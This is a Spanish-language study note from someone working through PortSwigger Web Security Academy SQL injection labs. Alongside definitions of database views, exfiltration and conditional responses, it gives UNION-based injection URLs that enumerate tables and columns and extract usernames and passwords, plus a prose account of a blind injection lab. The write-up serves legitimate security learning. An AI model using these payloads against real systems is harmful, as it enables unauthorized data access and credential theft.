---
tags:
  - sqli
---
### Teoría
*Conceptos nuevos*

**View**
> Un **view** (o "vista" en español) en una base de datos es una tabla virtual que se crea a partir de una consulta SQL. No almacena datos por sí misma, sino que presenta datos de una o más tablas subyacentes. Las vistas se utilizan para simplificar el acceso a los datos, ocultar la complejidad de las consultas y proporcionar una capa adicional de seguridad y control sobre los datos.

**Exfiltración**
> La exfiltración de datos, también conocida como extrusión de datos o exportación de datos, es el robo de datos: la transferencia intencionada, no autorizada y encubierta de datos desde un ordenador u otro dispositivo.La exfiltración de datos se puede realizar manualmente o automatizarse mediante [malware](https://www.ibm.com/es-es/topics/malware).

**Respuestas condicionales**
> Las respuestas condicionales en SQL se refieren al manejo de resultados basado en condiciones específicas dentro de una consulta SQL. Estas condiciones pueden ser expresadas mediante cláusulas como `CASE`, `IF`, `WHERE`, `HAVING`, entre otras.

**Tracking cookie**
> Una "tracking cookie" (cookie de seguimiento) es un tipo de cookie que se utiliza para rastrear el comportamiento de un usuario en línea a través de diferentes sitios web. Las cookies son pequeños archivos de texto que los sitios web colocan en el navegador del usuario para almacenar información, como preferencias de usuario, datos de inicio de sesión y detalles de seguimiento.
### Lab
*SQL injection attack, listing the database contents on non-Oracle databases*

**Pasos que he realizado**
1. Lo primero que he hecho es hacer un `SELECT version()` de PostgreSQL el UNION para asegurarme de que es una base de datos de este tipo.
![[Pasted image 20240608152609.png]]

**Resultado de la query**
![[Pasted image 20240608152819.png]]

2. Seleccionar nombres de tablas del information_schema (Contiene todas las tablas de la bd) 
```http
https://0ac8004a04b5aca48257975900cd00ad.web-security-academy.net/filter?category=Accessories' UNION SELECT table_name,null FROM information_schema.tables -- 
```
![[Pasted image 20240608173542.png]]

3. Seleccionar nombres de columnas de una tabla del information_schema

```http
https://0ac8004a04b5aca48257975900cd00ad.web-security-academy.net/filter?category=Accessories' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name = 'products' -- 
```

4. Voy a seleccionar los nombres de columnas de la tabla users_oonfvb que me parece un poco sospechosa
```http
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name = 'users_oonfvb' --
```

5. Por último seleccionaré los usuarios y contaseñas de la tabla sospechosa
```http
https://0ac8004a04b5aca48257975900cd00ad.web-security-academy.net/filter?category=Accessories' UNION SELECT username_klvxfu,password_fnxlja FROM users_oonfvb -- 
```

**(Hay que encodearlo)**
```http
https://0ac8004a04b5aca48257975900cd00ad.web-security-academy.net/filter?category=Accessories' UNION%20SELECT%20username%5Fklvxfu%2Cpassword%5Ffnxlja%20FROM%20users%5Foonfvb%20%2D%2D%20
```

![[Pasted image 20240608173803.png]]

**Resultado**
![[Pasted image 20240608173826.png]]

### Lab
*Blind SQL injection with conditional response*

Lo primero que he hecho es abrir el burp suite y mandar la petición al repeater porque es bastante molesto trabajar con cookies mediante el navegador. Con esta condición simple ya sabemos que estamos alterando el comportamiento de los condicionales, si sustituyo el 1 por un 2, welcome back ya no aparece.

![[Pasted image 20240608181552.png]]

Después de un rato consigo la condición para comparar los caracteres de la contraseña del admin que funciona, era un poco liosa porque al ser 'a' el primer carácter de la contraseña tenía que poner menor que en vez de mayor que a

![[Pasted image 20240608182817.png]]

### Conclusiones
Estos laboratorios van muy bien para familiarizarse con la **codificación url**, **aprendizaje de SQL** y **utilización del repeater** de burp suite. El último laboratorio me está costando más de lo que parecía que me iba a costar, lo voy a dejar para mañana.

### Apuntes creados
**SQLi > Obtener información**
[[11. Listing the contents of the database]]

**SQLi > Blind SQL Injection**
[[1. What is blind SQL injection?]]
[[2. Exploiting blind SQL injection by triggering conditional responses]]

### Estado del proyecto
- *Añadida plantilla "Reto 100 días"*
